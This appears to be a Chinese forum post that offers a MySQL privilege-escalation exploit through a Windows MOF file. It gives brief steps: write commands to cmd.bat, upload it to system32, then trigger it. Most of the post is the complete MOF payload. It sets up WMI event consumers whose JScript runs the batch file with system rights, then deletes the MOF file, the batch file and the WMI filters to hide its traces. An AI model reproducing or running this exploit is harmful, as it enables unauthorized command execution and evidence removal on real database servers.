Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。需要将要运行的命令写入到bat上传到system32目录,然后执行。
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
#pragma
namespace("\\\\.\\root\\cimv2")
class
MyClass547
{
string
Name;
};
class
ActiveScriptEventConsumer
: __EventConsumer {
string
Name;
string
ScriptingEngine; string
ScriptFileName;
string
ScriptText; uint32 KillTimeout;
}; instance of __Win32Provider as $P {
Name
=
"ActiveScriptEventConsumer"; CLSID =
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
PerUserInitialization
= TRUE;
}; instance of __EventConsumerProviderRegistration { Provider
= $P; ConsumerClassNames
=
{"ActiveScriptEventConsumer"};
};
Instance of ActiveScriptEventConsumer
as $cons { Name
=
"ASEC"; ScriptingEngine
=
"JScript"; ScriptText
=
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
Instance of ActiveScriptEventConsumer
as $cons2 { Name
=
"qndASEC"; ScriptingEngine
=
"JScript"; ScriptText
=
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
}; instance of __EventFilter as $Filt { Name
=
"instfilt"; Query
=
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
=
"WQL"; }; instance of __EventFilter as $Filt2 { Name
=
"qndfilt"; Query
=
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
=
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
= $cons; Filter
= $Filt;
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
= $cons2; Filter
= $Filt2;
}; instance of MyClass547
as $MyClass { Name
=
"ClassConsumer";
};
页:
[1]